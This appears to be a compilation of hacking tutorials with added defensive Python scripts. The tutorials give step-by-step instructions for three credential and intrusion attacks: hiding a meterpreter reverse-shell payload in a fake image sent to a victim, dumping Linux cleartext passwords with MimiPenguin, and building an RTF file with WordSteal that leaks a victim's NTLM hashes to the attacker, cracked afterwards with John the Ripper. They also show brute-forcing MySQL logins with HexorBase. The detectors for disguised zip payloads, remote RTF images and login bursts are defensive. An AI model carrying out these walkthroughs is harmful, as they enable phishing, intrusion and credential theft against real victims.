Embedded Backdoor with Image using FakeImageExploiter

In this article we introduce a newly launched hacking tool, “Fake Image Exploiter”. It is designed to make it easier for attackers to perform phishing or social engineering attacks by generating a fake image with a malicious .bat/.exe file hidden inside it.

Let’s start!

Open the terminal in Kali Linux and type the following command to download it from GitHub.

git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git

Once it is downloaded, open the folder and select the file “settings” for configuration before running the program, as shown in the given screenshot.

Now make some changes inside the settings file as shown in the screenshot:

Here you have to declare the type of payload extension you will use to hide inside the image. You can set any extension among these four: ps1, bat, txt, exe. I had set PAYLOAD_EXETNSION=bat; similarly, set BYPASS_RH=NO and scroll down for the next configuration.

In the same way, set these two values as shown in the screenshot, then save the changes.

AUTO_PAYLOAD_BUILD=YES

AGENT_HANLER_PORT=4444

After making these changes in the settings file, open the terminal and run the program file:

cd FakeImageExploiter

./FakeImageExploiter.sh

Click on YES to execute the framework.

Select the payload to build; I had chosen windows/meterpreter/reverse_tcp for the attack.

A pop-up box will then open, allowing you to choose any jpg image so that the .bat file payload can be hidden inside that image.

Now select an icon for your malicious image.

Give a name to your payload, which will be displayed to the victim as the file name; from the screenshot you can see I had given sales.

Now it generates a link, as you can observe from the highlighted part of the screenshot; send this link to the victim. The victim will download the zip file and click on sales.jpg.

When the victim clicks on sales.jpg, we will get a meterpreter session in the background on the Metasploit framework.
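For defenders screening downloads, the following added example (not code from the article or from FakeImageExploiter) audits a zip for entries that present as an image but carry a payload. It assumes the disguise is a double extension such as sales.jpg.bat, which the article does not spell out; the archive contents are constructed.

```python
import io
import zipfile

# Payload extensions listed in the article, and image extensions used as the disguise.
PAYLOAD_EXTS = {"ps1", "bat", "txt", "exe"}
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}
JPEG_MAGIC = b"\xff\xd8\xff"


def audit_zip(data: bytes) -> list[tuple[str, str]]:
    """Return (member, reason) pairs for entries that look like disguised payloads."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename.rsplit("/", 1)[-1].lower()
            exts = name.split(".")[1:]
            with zf.open(info) as fh:
                head = fh.read(3)
            # Assumption: the disguise is a double extension (image ext, then payload ext).
            if len(exts) >= 2 and exts[-1] in PAYLOAD_EXTS and exts[-2] in IMAGE_EXTS:
                findings.append((info.filename, "image name with payload extension"))
            elif exts and exts[-1] in {"jpg", "jpeg"} and head != JPEG_MAGIC:
                findings.append((info.filename, "JPEG name but non-JPEG content"))
            elif head[:2] == b"MZ" and (not exts or exts[-1] != "exe"):
                findings.append((info.filename, "PE header under non-exe name"))
    return findings


def build_sample() -> bytes:
    """Constructed archive: one genuine-looking JPEG and two disguised entries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("photo.jpg", JPEG_MAGIC + b"\xe0" + b"\x00" * 16)
        zf.writestr("sales.jpg.bat", "@echo constructed sample\r\n")
        zf.writestr("report.jpg", b"MZ" + b"\x00" * 16)
    return buf.getvalue()


if __name__ == "__main__":
    for member, reason in audit_zip(build_sample()):
        print(f"{member}: {reason}")
```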

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, and a Social Media and Gadgets Lover.

Dump Cleartext Password in Linux PC using MimiPenguin

Hello friends! Through this article we are introducing a new tool, MimiPenguin, which can be used for fetching the login of a Linux system in the same way as mimikatz.

It is a tool to dump the login password from the current Linux desktop user, adapted from the idea behind the popular Windows tool mimikatz.

It takes advantage of cleartext credentials in memory by dumping the process and extracting lines that have a high probability of containing cleartext passwords. It will attempt to calculate each word’s probability by checking hashes in /etc/shadow, hashes in memory, and regex searches.

Let’s begin

Open the terminal and type the following commands to download it from GitHub.

cd Desktop

git clone https://github.com/huntergregal/mimipenguin.git

ls

cd mimipenguin

Now run the bash file to catch the cleartext credentials:

./mimipenguin.sh

From the screenshot you can see I have got the login credential root: toor.


Stealing Windows Credentials of Remote PC with MS Office Document

Hello! Today you will find something incredible in this article, which is about a newly launched script named “WORD STEAL” that can sharpen your hacking skills more and more. This script will create a POC that will steal NTLM hashes from a remote computer.

Microsoft Word has the ability to include images from remote locations. This is an undocumented feature, but it was found being used by malware creators to include images over HTTP for statistics. We can also include remote files from an SMB server, and the victim will authenticate with his login credentials. This is very useful during a pentest because it allows you to steal credentials without triggering any alerts, and most security apps do not detect this.

Let’s Broach!!!

Attacker: Kali Linux

Target: Windows 10 (Microsoft Word 2007)

First we need to download it from GitHub; open the terminal in Kali Linux and type the following command.

git clone https://github.com/0x090x0/WordSteal.git

Now open the downloaded WordSteal folder, where you will find a Python script “main.py”; give all permissions to the main.py script if required.

chmod 777 main.py

As the author has described, this script will convert an image (say, a .jpg) into an .rtf (Microsoft Word file). The Rich Text Format is a proprietary document file format with a published specification, developed by Microsoft Corporation for cross-platform document interchange with Microsoft products.

Then download an image and save it inside the WordSteal folder. Since I have an image “1.jpg”, at this moment we need to type the following command, which generates an .rtf file that steals NTLM hashes from a remote computer.

python main.py 192.168.0.104 1.jpeg 1

The above command will generate an .rtf file, as you can see in the given screenshot; then send the 1.rtf file to the remote PC.

When the victim opens 1.rtf (as a Microsoft Word file) on his system, the attacker on the other hand will receive the NTLM hashes.

With WordSteal we have stolen credentials without triggering any alerts, which you can observe in the following image.

Now use the password cracking tool John the Ripper to crack the hashes in the password_netntlmv2 file, or type the following command:

john password_netntlmv2

Cool!!! We can clearly see the victim’s credentials, RAJ: 123, which might be further used for login.
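As an added example for mail or upload screening (not code from the article or from WordSteal), this scanner lists remote image references in an RTF document. It assumes the reference is carried in an INCLUDEPICTURE field; the sample document and its host names are constructed.

```python
import re

# Field instruction inside an RTF group: {\*\fldinst ... INCLUDEPICTURE "target" ...}
FIELD_RE = re.compile(r'\\fldinst[^}]*?INCLUDEPICTURE\s+"([^"]+)"', re.I)

# Constructed sample: two SMB-style targets, one HTTP target, one local path.
SAMPLE_RTF = r'''{\rtf1\ansi
{\field{\*\fldinst {INCLUDEPICTURE "file://192.0.2.10/1.jpg" \\* MERGEFORMAT}}{\fldrslt}}
{\field{\*\fldinst {INCLUDEPICTURE "\\\\fileserver.example\\share\\logo.jpg"}}{\fldrslt}}
{\field{\*\fldinst {INCLUDEPICTURE "http://stats.example/pixel.png"}}{\fldrslt}}
{\field{\*\fldinst {INCLUDEPICTURE "C:\\pics\\local.jpg"}}{\fldrslt}}
}'''


def remote_image_refs(rtf: str) -> list[tuple[str, str]]:
    """Return (kind, target) for every linked image that points off the machine."""
    refs = []
    for target in FIELD_RE.findall(rtf):
        # RTF escapes a literal backslash as two; undo that before classifying.
        target = target.replace("\\\\", "\\")
        # UNC path, //host form, or file:// with a host part: fetched over SMB.
        if re.match(r"(?:\\\\|//)[^\\/]|file://[^/]", target, re.I):
            refs.append(("smb", target))
        elif re.match(r"https?://", target, re.I):
            refs.append(("http", target))
        # Anything else (drive letter, relative path) is local and ignored.
    return refs


if __name__ == "__main__":
    for kind, target in remote_image_refs(SAMPLE_RTF):
        print(f"{kind:4} {target}")
```

An smb hit means Word will attempt to authenticate to that host when the document is opened. Blocking outbound SMB at the egress firewall stops the hash from leaving the network regardless of what the document contains.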


Brute Forcing Multiple Databases using HexorBase

HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location. It is capable of performing SQL queries and brute force attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL). HexorBase allows packet routing through proxies or even Metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

To run hexorbase in Kali Linux, click application > database assessment > hexorbase

Alternatively, open the terminal and type hexorbase.

It will open the graphical interface for hexorbase as given in the screenshot. It is a collection of several database servers where you can apply a brute force attack on the desired server.

Now, to start the brute force attack, you first need to create an account. In the middle you can see the administration panel; here type a username and password of your choice. I had typed admin: pass as username and password; this will allow me to start the brute force attack using hexor on the desired backend server.

Now choose your database type. I have selected MySQL for the brute force attack.

Now follow these few steps for the brute force attack on the server.

  • Type target IP: 168.1.104 under database connection.
  • Now click on user list for the dictionary attack option and select a dictionary of usernames.
  • Repeat the above step for word list to select a password list.
  • Finally click on launch attack to start the brute force attack.

Now it will try to match combinations of username and password on the target IP. After some time, when the process is 100% completed, you will get the matched combination as the result. You can see from the screenshot that I have got the username and password combination msfadmin:msfadmin for the MySQL server.
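On the server side this dictionary attack shows up as a burst of denied logins from one source; the added example below (not part of the article or of HexorBase) finds such bursts. It assumes access-denied notes are written to the error log in the MySQL 5.7 line format, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed line shape: <ISO timestamp>Z <thread id> [Note] Access denied for user 'u'@'host' ...
DENIED_RE = re.compile(
    r"^(\S+) \d+ \[\w+\] Access denied for user '([^']*)'@'([^']*)'")


def brute_force_sources(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {source: usernames tried} for sources with >= threshold denials in a window."""
    events = defaultdict(list)
    for line in lines:
        m = DENIED_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S.%fZ")
            events[m.group(3)].append((ts, m.group(2)))
    flagged = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # Slide the window start forward until it spans at most `window`.
            while evs[end][0] - evs[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[src] = sorted({user for _, user in evs})
                break
    return flagged


def build_sample():
    """Constructed log: six denials in six seconds from one host, two stray ones from another."""
    users = ["root", "admin", "msfadmin", "root", "admin", "root"]
    lines = [f"2017-05-10T09:15:0{i}.000000Z {20 + i} [Note] Access denied for user "
             f"'{u}'@'192.0.2.50' (using password: YES)" for i, u in enumerate(users)]
    for ts in ("2017-05-10T08:00:00.000000Z", "2017-05-10T09:30:00.000000Z"):
        lines.append(f"{ts} 7 [Note] Access denied for user "
                     "'backup'@'192.0.2.77' (using password: YES)")
    return lines


if __name__ == "__main__":
    for src, users in brute_force_sources(build_sample()).items():
        print(f"{src}: denied logins for {', '.join(users)}")
```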
